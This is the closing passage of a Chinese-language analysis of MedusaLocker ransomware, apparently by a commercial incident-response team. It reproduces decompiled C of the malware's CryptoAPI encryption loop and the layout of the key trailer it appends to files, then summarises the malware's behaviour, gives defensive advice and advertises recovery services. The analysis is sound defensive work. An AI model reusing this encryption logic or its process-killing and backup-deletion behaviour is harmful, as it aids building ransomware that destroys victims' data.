__int64 v29; // [rsp+88h] [rbp+1Fh]
DWORD pbData; // [rsp+E0h] [rbp+77h] BYREF
DWORD pdwDataLen; // [rsp+E8h] [rbp+7Fh] BYREF
v4 = 0LL;
phProv = 0LL;
hKey = 0LL;
v5 = 0;
pbData = 0;
pdwDataLen = 4;
KeyParam = CryptAcquireContextW(&phProv, 0LL, 0LL, 1u, 0xF0000040);
if ( KeyParam )
{
KeyParam = CryptImportKey(phProv, *(const BYTE **)a1, *(_DWORD *)(a1 + 8) - *(_DWORD *)a1, 0LL, 0, &hKey);
if ( KeyParam )
{
KeyParam = CryptGetKeyParam(hKey, 8u, (BYTE *)&pbData, &pdwDataLen, 0);
if ( KeyParam )
{
v7 = pbData >> 3 == 11;
v8 = (pbData >> 3) - 11;
pbData = v8;
v9 = v8;
v10 = 0LL;
v25 = 0LL;
v11 = 0LL;
v26 = 0LL;
v27 = 0LL;
if ( !v7 )
{
alloc_memory(&v25, v8);
v10 = (char *)v25;
memset(v25, 0, (unsigned int)v9);
v11 = &v10[v9];
v26 = &v10[v9];
v8 = pbData;
v4 = v27;
}
v28 = 0LL;
v29 = 0LL;
v12 = 0LL;
while ( 1 )
{
v13 = *a2;
v14 = a2[1] - *a2;
if ( v8 >= (unsigned __int64)(v14 - v12) )
v8 = v14 - v5;
v20 = v8;
memcpy(v10, (const void *)(v12 + v13), v8);
v21 = v20 + v5;
v15 = a2[1] - *a2;
v12 = v21;
pdwDataLen = v20;
Final = v21 == v15;
KeyParam = CryptEncrypt(hKey, 0LL, Final, 0, 0LL, &pdwDataLen, 0);
if ( !KeyParam )
break;
if ( pdwDataLen > (unsigned __int64)(v11 - v10) )
{
if ( pdwDataLen <= (unsigned __int64)(v4 - (_QWORD)v10) )
{
v16 = pdwDataLen - (v11 - v10);
memset(v11, 0, v16);
v11 += v16;
v26 = v11;
}
else
{
sub_7FF6BE635790((__int64)&v25, pdwDataLen);
v4 = v27;
v11 = v26;
v10 = (char *)v25;
}
}
KeyParam = CryptEncrypt(hKey, 0LL, Final, 0, (BYTE *)v10, &v20, (_DWORD)v11 - (_DWORD)v10);
if ( !KeyParam )
break;
sub_7FF6BE635550(&v28, *((_QWORD *)&v28 + 1), v10, v20);
if ( v12 == v15 )
break;
v8 = pbData;
v5 = v21;
}
cat_(a2, &v28);
v17 = (void *)v28;
if ( (_QWORD)v28 )
{
if ( (unsigned __int64)(v29 - v28) >= 0x1000 )
{
v17 = *(void **)(v28 - 8);
if ( (unsigned __int64)(v28 - (_QWORD)v17 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v17);
}
if ( v10 )
{
v18 = v10;
if ( (unsigned __int64)(v4 - (_QWORD)v10) >= 0x1000 )
{
v10 = (char *)*((_QWORD *)v10 - 1);
if ( (unsigned __int64)(v18 - v10 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v10);
}
}
}
}
if ( hKey )
CryptDestroyKey(hKey);
if ( phProv )
CryptReleaseContext(phProv, 0);
return KeyParam;
}
4.1.7 加密文件
给文件添加加密后缀
在开始加密前,他会先将后生成并且加密后的rsa私钥和加密后的aes密钥写入末尾
以及写了了一串用于标识的加密序列
00 00 00 00 00 00 01 00 00 00 C0 71 0B 00 C0 D0 03 00
使用aes-ecb加密文件
5.病毒分析概览
MedusaLocker勒索病毒采用AES-ECB对文件进行加密,并使用RSA加密AES密钥,以确保数据无法轻易恢复。病毒执行时,首先调用CryptGenRandom生成AES密钥,并随机生成的RSA私钥钥用于加密该密钥。随后,程序初始化配置,创建任务对象,加载资源,并生成公钥,同时写入注册表。病毒还会添加开机启动项,以维持持久性。执行过程中,它会强制终止SQL Server相关进程、清除备份与恢复点,并遍历系统目录和网络驱动器,筛选目标文件进行加密。在加密前,病毒将RSA私钥和AES密钥加密后写入文件末尾,确保受害者无法解密文件。
6.安全建议
1. 风险消减措施
资产梳理排查目标: 根据实际情况,对内外网资产进行分时期排查
服务方式: 调研访谈、现场勘查、工具扫描
服务关键内容: 流量威胁监测系统排查、互联网暴露面扫描服务、技术加固服务、集权系统排查
2. 安全设备调优
目标
通过对安全现状的梳理和分析,识别安全策略上的不足,结合目标防御、权限最小化、缩小攻击面等一系列参考原则,对设备的相关配置策略进行改进调优,一方面,减低无效或低效规则的出现频次;另一方面,对缺失或遗漏的规则进行补充,实现将安全设备防护能力最优化。
主要目标设备
网络安全防护设备、系统防护软件、日志审计与分析设备、安全监测与入侵识别设备。
3. 全员安全意识增强调优
目标:
通过网络安全意识宣贯、培训提升全方位安全能力
形式:
培训及宣贯
线下培训课表
若无法组织线下的集体培训,考虑两种方式:
1.提供相关的安全意识培训材料,由上而下分发学习
2.组织相关人员线上开会学习。线上培训模式。
线上学习平台
以下是solar安全团队近期处理过的常见勒索病毒后缀:后缀.360勒索病毒,.halo勒索病毒,.phobos勒索病毒,.Lockfiles勒索病毒,.stesoj勒索病毒,.src勒索病毒,.svh勒索病毒,.Elbie勒索病毒,.Wormhole勒索病毒.live勒索病毒, .rmallox勒索病毒, .mallox 勒索病毒,.hmallox勒索病毒,.jopanaxye勒索病毒, .2700勒索病毒, .elbie勒索病毒, .mkp勒索病毒, .dura勒索病毒, .halo勒索病毒, .DevicData勒索病毒, .faust勒索病毒, ..locky勒索病毒, .cryptolocker勒索病毒, .cerber勒索病毒, .zepto勒索病毒, .wannacry勒索病毒, .cryptowall勒索病毒, .teslacrypt勒索病毒, .gandcrab勒索病毒, .dharma勒索病毒, .phobos勒索病毒, .lockergoga勒索病毒, .coot勒索病毒, .lockbit勒索病毒, .nemty勒索病毒, .contipa勒索病毒, .djvu勒索病毒, .marlboro勒索病毒, .stop勒索病毒, .etols勒索病毒, .makop勒索病毒, .mado勒索病毒, .skymap勒索病毒, .aleta勒索病毒, .btix勒索病毒, .varasto勒索病毒, .qewe勒索病毒, .mylob勒索病毒, .coharos勒索病毒, .kodc勒索病毒, .tro勒索病毒, .mbed勒索病毒, .wannaren勒索病毒, .babyk勒索病毒, .lockfiles勒索病毒, .locked勒索病毒, .DevicData-P-XXXXXXXX勒索病毒, .lockbit3.0勒索病毒, .blackbit勒索病毒等。
勒索攻击作为成熟的攻击手段,很多勒索家族已经形成了一套完整的商业体系,并且分支了很多团伙组织,导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同,TellYouThePass勒索软件家族常常利用系统漏洞进行攻击;Phobos勒索软件家族通过RDP暴力破解进行勒索;Mallox勒索软件家族利用数据库及暴力破解进行加密,攻击手法极多防不胜防。
而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份,在其基础上加强公司安全人员意识。如果您想了解有关勒索病毒的最新发展情况,或者需要获取相关帮助,请关注“solar专业应急响应团队”。
7.团队介绍
团队坚持自主研发及创新,在攻防演练平台、网络安全竞赛平台、网络安全学习平台方面加大研发投入,目前已获得十几项专利及知识产权。团队也先后通过了ISO9001质量管理体系、ISO14000环境管理体系、ISO45001职业安全健康管理体系 、ITSS(信息技术服务运行维护标准四级)等认证,已构建了网络安全行业合格的资质体系;
8.我们的数据恢复服务流程
多年的数据恢复处理经验,在不断对客户服务优化的过程中搭建了"免费售前+安心保障+专业恢复+安全防御"一体化的专业服务流程。
① 免费咨询/数据诊断分析
专业的售前技术顾问服务,免费在线咨询,可第一时间获取数据中毒后的正确处理措施,防范勒索病毒在内网进一步扩散或二次执行,避免错误操作导致数据无法恢复。
售前技术顾问沟通了解客户的机器中毒相关信息,结合团队数据恢复案例库的相同案例进行分析评估,初步诊断分析中毒数据的加密/损坏情况。
② 评估报价/数据恢复方案
您获取售前顾问的初步诊断评估信息后,若同意进行进一步深入的数据恢复诊断,我们将立即安排专业病毒分析工程师及数据恢复工程师进行病毒逆向分析及数据恢复检测分析。
专业数据恢复工程师根据数据检测分析结果,定制数据恢复方案(恢复价格/恢复率/恢复工期),并为您解答数据恢复方案的相关疑问。
③ 确认下单/签订合同
您清楚了解数据恢复方案后,您可自主选择以下下单方式:
双方签署对公合同:根据中毒数据分析情况,量身定制输出数据恢复合同,合同内明确客户的数据恢复内容、数据恢复率、恢复工期及双方权责条款,双方合同签订,正式进入数据恢复专业施工阶段,数据恢复后进行验证确认,数据验证无误,交易完成。
④ 开始数据恢复专业施工
安排专业数据恢复工程师团队全程服务,告知客户数据恢复过程注意事项及相关方案措施,并可根据客户需求及数据情况,可选择上门恢复/远程恢复。
数据恢复过程中,团队随时向您报告数据恢复每一个节点工作进展(数据扫描 → 数据检测 → 数据确认 → 恢复工具定制 → 执行数据恢复 → 数据完整性确认)。
⑤ 数据验收/安全防御方案
完成数据恢复后,我司将安排数据分析工程师进行二次检查确认数据恢复完整性,充分保障客户的数据恢复权益,二次检测确认后,通知客户进行数据验证。
客户对数据进行数据验证完成后,我司将指导后续相关注意事项及安全防范措施,并可提供专业的企业安全防范建设方案及安全顾问服务,抵御勒索病毒再次入侵。
我们在此郑重承诺:
不成功不收费
全程一对一服务
365天不间断服务
免费提供安全方案
24h服务热线:
18894665383
17864099776
18299173318
